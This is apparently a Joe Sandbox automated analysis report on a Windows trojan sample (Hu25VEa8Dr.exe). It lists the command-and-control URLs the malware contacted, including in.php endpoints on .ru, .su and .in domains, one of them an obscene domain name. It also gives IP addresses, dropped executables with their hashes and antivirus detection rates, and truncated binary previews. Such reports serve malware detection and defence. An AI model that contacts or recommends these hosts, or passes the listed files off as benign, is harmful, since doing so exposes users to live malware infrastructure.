      http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmpfalse
      • 3%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:svchost.exe, 00000009.00000002.381503603.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381500240.000000000044A000.00000004.00000010.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tlsvchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://somicrososoft.ru/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
      • 14%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://img.suckmycocklameavindustry.in/svchost.exefalse
      • 4%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/Hu25VEa8Dr.exe, 00000003.00000002.350134891.0000000002120000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorHu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drfalse
          high
          http://anam0rph.su/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqhsvchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
          • 14%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://sc.suckmycocklameavindustry.in/svchost.exefalse
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://ygiudewsqhct.in/in.phpsvchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpfalse
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          34.29.71.138
          pe.suckmycocklameavindustry.inUnited States
          2686ATGS-MMD-ASUStrue
          147.75.61.38
          xdqzpbcgrvkj.ruSwitzerland
          54825PACKETUStrue
          IP
          192.168.2.255
          Joe Sandbox Version:38.0.0 Beryl
          Analysis ID:1317431
          Start date and time:2023-10-01 06:00:34 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 36s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:Hu25VEa8Dr.exe
          (renamed file extension from none to exe, renamed because original name is a hash value)
          Original Sample Name:9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@17/19@7/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 106
          • Number of non-executed functions: 135
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
          • Excluded IPs from analysis (whitelisted): 209.197.3.8, 8.252.14.254, 67.26.203.254, 8.253.135.120, 8.252.139.254, 8.252.140.126, 20.72.235.82
          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, redir.update.msft.com.trafficmanager.net, www.update.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          06:01:19API Interceptor8x Sleep call for process: Hu25VEa8Dr.exe modified
          06:01:26API Interceptor1x Sleep call for process: msiexec.exe modified
          06:01:35API Interceptor42x Sleep call for process: svchost.exe modified
          No context
          No context
          No context
          No context
          No context
          Process:C:\Windows\SysWOW64\svchost.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):88209
          Entropy (8bit):7.192271927525946
          Encrypted:false
          SSDEEP:1536:cpgpHzb9dZVX9fHMvG0D3XJz0MAuV9wWGm1FJaThXPF5zRRn55NATTeIIQ:qgXdZt9P6D3XJYMHV9wWGkEZ7Fx55NCr
          MD5:B3657BCFE8240BC0985093A0F8682703
          SHA1:4E19F1CC04645356FD523E67655E5D76A19A86BA
          SHA-256:5F4B0AA22CE65B30FB232421673FAD4C126970928207ADE256D3BFEE33DC3687
          SHA-512:71C06203020C5C5BCB1C9F8383544BF270C5D7FAC1E732FEC1F78820BBF91A6DB5888FF57D782A05D49A960351B5436966C78974C60B40908099603118C56B15
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 87%
          • Antivirus: Virustotal, Detection: 85%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......p..X?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...X?...p...@...z..............@..@................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):196227
          Entropy (8bit):7.67760121359675
          Encrypted:false
          SSDEEP:3072:ugXdZt9P6D3XJ3TCM/vosUE2L/TLqtAyD2XXhtksIae31fXJHhKgzyJtdeV:ue34p/vr6yrC2sJe35ZBKg0dW
          MD5:BC76BD7B332AA8F6AEDBB8E11B7BA9B6
          SHA1:C6858031315A50EC87E37966291EC69B64600EFB
          SHA-256:9535A9BB1AE8F620D7CBD7D9F5C20336B0FD2C78D1A7D892D76E4652DD8B2BE7
          SHA-512:C74A8A893D0D91EF9423C75C14E701102F01D46B4638D7E3184C95BFD4FF29F9CAB71FE5DE45E8E201DCDB8DF77E952A18E32BFED5014B9C8155C189825F37E9
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 96%
          • Antivirus: Virustotal, Detection: 82%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......p...C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C...p...D...z..............@..@................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:false
          Reputation:low
          Preview:[ZoneTransfer]....ZoneId=0
          Process:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):3584
          Entropy (8bit):2.4737941425256986
          Encrypted:false
          SSDEEP:24:ev1GSN60IFZCJdYvP/yYhqIVrfRgtaU40Zfxw6XgE:q0LZCDYHJrftofXg
          MD5:775A98111E9A1142F44EE78ABD0C37AA
          SHA1:1566C2070880FD0A7533AB34F19C9DF13E166F30
          SHA-256:855C6ECC9D9B3BA70B1E4D6F1CECC9AE88F9A36E62338C0C9000CEF28EA85F85
          SHA-512:B154DCCBEC5D4F236C66B1FC045A886C4CBB8DF6CD11FCF7FF48101AE233AD0E849424014401348F7815C788EAE366A1FD681449E534FBD4554475507718E228
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 59%
          • Antivirus: Virustotal, Detection: 59%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._.).U.._...^.._.).T.._.).[.._.Rich.._.........................PE..L....xGQ...........!................f........ ...............................P....................................... ..P.... ..(............................@..P.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...H....0......................@....reloc..v....@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4608
          Entropy (8bit):3.3074171093110873
          Encrypted:false
          SSDEEP:48:CXqWBMk6A7qZ2LcYKEbcqNCCC81iBtYf86SyuUH5npNpRppv5D:Cqv2cOCCC81Aw8hyBnNvv
          MD5:7AC02E7E2C7EC30BFC8C946D12DF26A0
          SHA1:079FF9DBFC5AF1D4DC569203847F50A8B30B5056
          SHA-256:71CFBE0622AEA1248EFF7CA09095493B3D47DF40E0936493B098D770551213F3
          SHA-512:DAC09E5CA0BDA7A9094A34F17B6606767B4A1E308148BFC1AC7E1C0AA55404C4AA50366C8F5F9BC2D225BE88D9290CCB7F55AECF71CB400528538367A2E2CA3F
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 77%
          • Antivirus: Virustotal, Detection: 75%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IMr..,...,...,...0...,...3...,...,...,..o3...,...3...,...*...,...3...,..Rich.,..........................PE..L.....GQ...........!......................... ...............................`....................................... ..J... ..<....@..X....................P..d.................................................... .. ............................text...B........................... ..`.rdata..*.... ......................@..@.data...x....0......................@....rsrc...X....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4608
          Entropy (8bit):3.7221735995832015
          Encrypted:false
          SSDEEP:48:CXqWBMkLSPowUXULXfCmY6ULcYKEbc2VsTgt0fJdkp9uUH5nr3dppfO9:CqN7UXULXffY6EcSMJdkrBV3F29
          MD5:213FF346767B1B7C2AF9EC4EF51A7267
          SHA1:66D9FE22F0403E52EFFCCE675DEB8D674C11AF5D
          SHA-256:F227C46CCD589B9F48F066F0901DFF6A772B332E725BA0030A273B5B5A8BC41C
          SHA-512:B91E4D76F17B9245AE97FD7D7FB44E307C8A2A0C043FD212BAA7C4EEE946729A43CEF72F77344EA52BA6C9934CE01F85F6E839CC00BEB4ABEABDCF4B32644206
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 71%
          • Antivirus: Virustotal, Detection: 66%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IMr..,...,...,...0...,...3...,...,...,..o3...,...3...,...*...,...3...,..Rich.,..........................PE..L....xGQ...........!................O........ ...............................`....................................... ..K... ..<....@..`....................P..|.................................................... .. ............................text............................... ..`.rdata..+.... ......................@..@.data........0......................@....rsrc...`....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):19968
          Entropy (8bit):4.009299462345418
          Encrypted:false
          SSDEEP:96:kinIPI95bH6bfG6rg0cbqiJrlUoynNmwIvc0NFSH:XnD5bGVrlHiJrlUoynNmwIvN4
          MD5:44902781C1865978B17F396DB51D85E1
          SHA1:D1EBC2238FCA1CFFCABBD692E9AF4D3121396983
          SHA-256:667FFD6F177DD67F4928DDE38378C5E500984CE40ED73BB6F1B3EE997B513403
          SHA-512:D60828174B1D042A4541FD26D4AF2DEABD44BB862C416B31BE28DE0B133FC9E2569389CDD0185B70819080B5AF0F54CFC72F7B96808CEE7FFB7C4C7E3E764774
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 76%
          • Antivirus: Virustotal, Detection: 77%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.v.#.%.#.%.#.%.?.%.#.%N?.%.#.%%<.%.#.%%<.%.#.%.<.%.#.%.#.%.#.%%<.%.#.%u%.%.#.%Rich.#.%................PE..L....xGQ.....................@............... ....@.......................................................................... .......@..H7........................................................................... ...............................text...0........................... ..`.rdata..t.... ......................@..@.data........0......................@....rsrc...H7...@...8..................@..@........................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):88209
          Entropy (8bit):7.192271927525946
          Encrypted:false
          SSDEEP:1536:cpgpHzb9dZVX9fHMvG0D3XJz0MAuV9wWGm1FJaThXPF5zRRn55NATTeIIQ:qgXdZt9P6D3XJYMHV9wWGkEZ7Fx55NCr
          MD5:B3657BCFE8240BC0985093A0F8682703
          SHA1:4E19F1CC04645356FD523E67655E5D76A19A86BA
          SHA-256:5F4B0AA22CE65B30FB232421673FAD4C126970928207ADE256D3BFEE33DC3687
          SHA-512:71C06203020C5C5BCB1C9F8383544BF270C5D7FAC1E732FEC1F78820BBF91A6DB5888FF57D782A05D49A960351B5436966C78974C60B40908099603118C56B15
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 87%
          • Antivirus: Virustotal, Detection: 85%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......p..X?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...X?...p...@...z..............@..@................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):3.1878975851833986
          Encrypted:false
          SSDEEP:192:1AFmqdxP1oynRg94DELe9vZ/wJcVuhWEx:yFL1Q9eR6hTx
          MD5:7FE00CC4EA8429629AC0AC610DB51993
          SHA1:5B2B4BF75EF99D03D3EA3A778E0BD0B124C5E70B
          SHA-256:9827E20FFED86C23DD493845F03A9041977C5CF0E5DA14EDFEB7EDADFAA34508
          SHA-512:F1E919C53E6829447F03AAFEDFC0128CEC4F03C21CC127A26C9CB336D42DEBF94703C9939976EE9B74F629C6713CB571F178D500503BE88E8A2D770AA2843BF5
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 57%
          • Antivirus: Virustotal, Detection: 61%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v..%..%..%T..%..%?..%..%?..%..%...%..%..%..%?..%..%o.%..%Rich..%................PE..L.....GQ.....................V......6........ ....@.......................................................................... .......P...;........................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....;...P...<..................@..@................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):7.980181192486164
          Encrypted:false
          SSDEEP:1536:gVbB3S+6LC/SQd6sTGmGEWx+JWgxhfCvWYjo/pk2X+FMCZTtkUn4rEeaMj31e5+P:KhTSQ0omUyD2X8htksIae31fX9cnheF7
          MD5:0F12B3226FE28398608E4F48B3FAFCA2
          SHA1:38B5BFD50DF9775C8ED379A0FA5F43979411E252
          SHA-256:7637E855C4F59DDFE01C9857FBDFF59036177BC1B439B4B0A24E14BC2E3E509A
          SHA-512:089DBFF0BFB72F3925E67055D45D357602D999AFAF7E82238AF18A2D3C86C9B1C37672C049E14939B3E414B11875DD70EF31F72D29B3ADA68D826081B5C347AF
          Malicious:false
          Reputation:low
          Preview:a\JFBTTs[YWQrM82758275827g]ABX]f_G]SS5827582758275827^]@YPT...\^[58275827582758275kWCaP@RT\qX[LWOA8275827582yAm\ZTHd^PO}Qf]QC\W\75827582pPLf_G]SSvW\CP@F758275827582pPL.XQM^RsQ^R{Y_Rt82758275827gL^mPJ]zPU]EL8275827582758\CQT^.QT^75827582758275.WCeJ]Tt\VEPKA75827582{ZYV{\Z@VGAs758275827582758a_YOSG\.V[Y827582758275827582`GQFReJ]TPKAzPU]EL82758275.WCvW_ZTVV{\VWv58275827eYF_r]FvG_Av582758275827vJWVA]bEZ[WDFy2758275827582758275uh.5;275<275..75.2758275x27582758275827582758275827582758275.2756-.;8.>...6y..c]QA.EJ]PGY_.VY\YZL.UP.@B[.[Y.|}d.U]SP.?:?.2758275.....O...O...O..7P...O..\S...O..7P...O...O...O..P...O...O...O..7P...O..gI...O..j[T].O..82758275hw75t345..pd82758275.284331582758.658275..758"758"7582w58"758075<2758275<27582758.5586758275:27582'58"7582'58"758275(27582758275<#75.2758.75..658275827582758275827582758275827582758275827582758275827582758275827582758"75.275827582758275827582758275.@STLS75d4758"758:758675827582758275x27u.VVAY275.?758.758<758>75827582758275x27..@DG[275..658.758.658(
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):3072
          Entropy (8bit):2.9848615810105574
          Encrypted:false
          SSDEEP:24:eFGSWUcWLuSDlkGPfe58//zYVVfiRHtaU4VExxSIVSPAEVlcr7:iWGLvybcMDfXtVe4PAylcr
          MD5:3ED0F4B16841CCF3C6D613E77BCEF3CD
          SHA1:751E4846DB47CCF5F94DB4CA198E96E77A7032E7
          SHA-256:A9B7526FE7C988F2219FA3B726DC2F771DE38C31593C3B8DAD3AC06E60135AC3
          SHA-512:6D44120D28AB5CA8164423C428EDDBF488C605A56F20794BB96618E8539AA50F9A24B9FD48E58001CEB95EC7932DC96BC48CB3F9C732FA0481F76C81F91CFFCB
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 64%
          • Antivirus: Virustotal, Detection: 74%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................y................y.....y.....Rich...........PE..L.....GQ...........!................Q........ ...............................P...................................... !..O...$ ..<............................@..L.................................................... ..$............................text............................... ..`.rdata..o.... ......................@..@.data...d....0......................@....reloc..t....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):17408
          Entropy (8bit):6.090813739725965
          Encrypted:false
          SSDEEP:192:ZPtFv5PY4kJlbZxiDZmZBdZDETl/trQXYezGGK5vZgZa+HNgtt1ycHl0WqESzyyE:rgZOZmlGNZJ+ytLdKyyT20dX1o9Fn
          MD5:67A995C0B4C431BE506625F3674DC621
          SHA1:72C43092973661CA8E5225749EA6CD9CFC3423DC
          SHA-256:4BEA02228E8CA0854826D6A3BB0D8DC5E6F2828B344AEF8E2B811D06F8EB67AA
          SHA-512:9F85EF3E51C484C4B13484F04D3ECEA1CDF34ECE7DBB6BEF544DE63BD160FDE60360D76CC2B7509E07F5830FECA1829344597C21135FC5CF231B4FD2E92BA4BD
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 59%
          • Antivirus: Virustotal, Detection: 71%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Pv.>%.>%.>%1.4%.>%Z.0%.>%..-%.>%.?%..>%1.5%.>%a.8%.>%1.:%.>%Rich.>%........PE..L....xGQ...........!.....,..........I........@.......................................................................G..O....C..(....`..X....................p.......................................................@...............................text....*.......,.................. ..`.rdata.._....@.......0..............@..@.data........P.......8..............@....rsrc...X....`.......:..............@..@.reloc.......p.......>..............@..B................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):17408
          Entropy (8bit):6.081723116162573
          Encrypted:false
          SSDEEP:192:MwPLlx5c4kJlbOxPDAE/mZBdZDEql+frQXYezGGK5vJgZa+HNgt/GI/x0mqESzyj:nsORXml/gDJuyt/RqyyuFX4o947Q
          MD5:F0C82EE96B56BF20D2B1CE93F7C0F941
          SHA1:432B3E4B9A1362D267630655DD44FEE58C49A2F0
          SHA-256:E6E1FA7A937C3CFA383C7A5CC5D1723E551A8AF62A03C7D8AF46504384D7993D
          SHA-512:0A342A87300C8BE6E1558A2729418A286F2770AE51960083289B25055659F27B3CC8870636660ECA67CC0C0A88D4E416B48B8ABFA0B709D434A953D6E59220D2
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 78%
          • Antivirus: Virustotal, Detection: 76%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Xv.6%.6%.6%1.<%.6%Z.8%.6%..%%.6%.7%..6%1.=%.6%a.0%.6%1.2%.6%Rich.6%........................PE..L.....GQ...........!.....,..........N........@.......................................................................F..O....C..(....`..`....................p.......................................................@...............................text....*.......,.................. ..`.rdata..?....@.......0..............@..@.data........P.......8..............@....rsrc...`....`.......:..............@..@.reloc.......p.......>..............@..B................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          File Type:data
          Category:dropped
          Size (bytes):24576
          Entropy (8bit):7.710087680990932
          Encrypted:false
          SSDEEP:384:1vPMrqX9DPfgkbWXqJNkNOYBNduseKKtCzkIPxOHPKRcadXpemop3gOrpNZ47vgJ:1vPeGDPfY6N8OYBNiwkIZcWcIpeXgqBJ
          MD5:45C8066C7A91E80794989C5BB03279CD
          SHA1:C16572FC6A2B7E5D2A5912CF175C9CDD7E4DDA78
          SHA-256:494A2F8CEB59B0A73B2CAE75A8016F1B5EED0355899A8FE27DE3ECF4856C89AC
          SHA-512:90136A41568E730749A954BD43D0EDBFE2BCFF53D67E16CF651830E1C028A5C866E0B462C88E67BDC627C8B016B56BDDC4794FF5BCF1F621A274A6007A244B6A
          Malicious:false
          Reputation:low
          Preview:qFSQAWdD_VWGEq52460524eUAf\DUTVwY^AWLB0524605246`TF\qUAsFQCt2460524605\@R\Y.PZ\5246052460524`YGFAW\t^XYSpJ46052460524605uQBd]@QWTv]ZBUMF4605246052_SB[WX...VXZ0524605246052460rW@u_X_UXTy[ZSq5246052460524qUAbFYStVPDUFA4605246052cDYAWdD_VWGE}P_[DI52460{FaX]TBb_UB}ReUVF]Y^52460524dDYhQD_xWYYBL24605246052g^\BSD_.Q^X605246052460524605`QEEXW`^BPSP60524605246|ZSPzYW@UDIt24605246052460rW@{_QGXSv\^QxQXWu60524605246052460xh.635242052..05.4605246p52460524605246052460524605246052460.246>*.:6.<...1y..bX\A.FBZUFW].QUX^ZF.TU.@AX.\\.r.f.YYTP.9;:.2460524.,...K...I...O..?W...M..PW...I..:P...H...M...K..V...O...H...M..;T...I..jI...H..dYVZ.K..24605246`p24z162...d24605246.5=5=13246052h605246..246 524&0524v05"46072420524605646052460.2464524605046052$60%2460%24&052460%246052460520'05.4605.46.q246052460524605246052460524605246052460524605246052460524605246052460524605"46.524605246052460524605246052.DTTFU60i4460%2468524205246052460524v05r.RQAS460.?460.246>524:05246052460524v05..DCGQ460.v460.246v524,052460524605
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):3.080260047634796
          Encrypted:false
          SSDEEP:24:ev1GSqYDIuQyKxsq1X//oRVCR7tqU4xbaVZGy1Uua0wlqF4JNeS4G8Xq5S493Q00:qq4IBvsW/uTtx2OySuF30lN3T74
          MD5:81F429115E1AFD4A95DA0A8A73E4ACD1
          SHA1:520F4618A20E20E2ACC2382AF16CA244FE42B97E
          SHA-256:29D1AC834EDB48C1A75C90CF896EF27A53366BFECDEE7D65DDBB6621DC540200
          SHA-512:350994DB9C153E5CE2DD62D3C759378E0CD091F8FBD67E6D555FF34266C4BB5097FB376DC007D89EEDF939DA05BDBFFE00EF2A9A8EA2C0048C309702D1163619
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 67%
          • Antivirus: Virustotal, Detection: 67%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1.k.1.k.1.k..a.5.k.1.j.=.k..`.3.k...m.0.k..o.5.k.Rich1.k.................PE..L.....GQ...........!................Q........ ...............................`.......................................!..M..., ..(....@.......................P..P.................................................... ..,............................text............................... ..`.rdata..M.... ......................@..@.data...X....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4608
          Entropy (8bit):2.9251612114551473
          Encrypted:false
          SSDEEP:24:ev1GSsGN+gg438JKANCE/mh7Vj3RotYU4sZfHtV1VdODXyIua0wJlRh1N7oRRC85:qsGtg43q3pgptgfHtA9uFmt/CCan+7
          MD5:E397A32C7C3ACA65A2A94D923F407B52
          SHA1:93C91BB1E8FDA9ECEC5A999BE0662A4E633D767F
          SHA-256:46B5B07EF3ADA0792C594D7FAAFF667DECF81E968908FADCD2F6020EACF400CD
          SHA-512:7BA018E72E51B78178E15A7BF940782815570D6D9A2E76A7C235877C5A447E3B8A91EF15E801D700D4857E0AA73589F526D34A8347D09A04A04F2D0AADE236A7
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 71%
          • Antivirus: Virustotal, Detection: 73%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......................c....................Rich...........PE..L....xGQ...........!................{........ ...............................`......................................P!..N...4 ..<....@.......................P..P.................................................... ..4............................text............................... ..`.rdata....... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\Hu25VEa8Dr.exe
          File Type:data
          Category:dropped
          Size (bytes):46
          Entropy (8bit):1.0424600748477153
          Encrypted:false
          SSDEEP:3:/lbWwWl:sZ
          MD5:3B7B4F5326139F48EFA0AAE509E2FE58
          SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
          SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
          SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
          Malicious:false
          Reputation:low
          Preview:........................................user.
          Process:C:\Windows\SysWOW64\svchost.exe
          File Type:ASCII text
          Category:modified
          Size (bytes):99
          Entropy (8bit):4.623332970722682
          Encrypted:false
          SSDEEP:3:PfmYZLIRSzZfZJWEA1QWQRUvNxdQVeXvWA7dXviVPv:P+ILIR0lWn1QrmvN3A+Ngv
          MD5:CCF36D8632B95ACA87A55794AD9A3AF8
          SHA1:16586E00683427DC7C1090EDA5D575B103DDF8F1
          SHA-256:4A4EE293DAB048952EEC9CCDCECF457646FC7B4135CFAE76CB6ABD3C83E6C431
          SHA-512:5C3245D6B5110057BA3790184C3F26BC8F243F70456ED13A553521BCE2BAD7E4B46FE23631FD5CF6E04AF9B9660D5CAB7D0CCBC649A5B393F6B0E0368F66A2B8
          Malicious:false
          Reputation:low
